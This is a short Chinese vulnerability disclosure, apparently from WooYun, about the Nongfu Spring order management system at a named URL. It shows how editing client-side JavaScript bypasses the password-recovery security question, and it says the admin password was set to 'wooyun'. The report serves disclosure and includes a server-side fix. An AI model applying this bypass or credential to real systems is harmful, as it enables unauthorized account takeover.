农夫山泉有点虫,危机公关做的太差,网站更不用说了.
订单管理系统http://cms.nfsq.com.cn:8186/app/
找回密码验证密码提示问题那里出点问题,
采用javascript客户端验证,还不出不验证呢
admin的密码为wooyun
漏洞 证明:
success : function(data){
if(data==1){
$("#div2").show();
$("#td1").show();
return true;
}else{
onerror : "对不起,答案错误";
return false;
}修改为
success : function(data){
if(data==1){
$("#div2").show();
$("#td1").show();
return true;
}else{
$("#div2").show();
$("#td1").show();
return true;
}
},
修复方案:在服务端验证提示问题答案
查看更多关于农夫山泉有点虫:未授权访问/权限绕过 - 网站安的详细内容...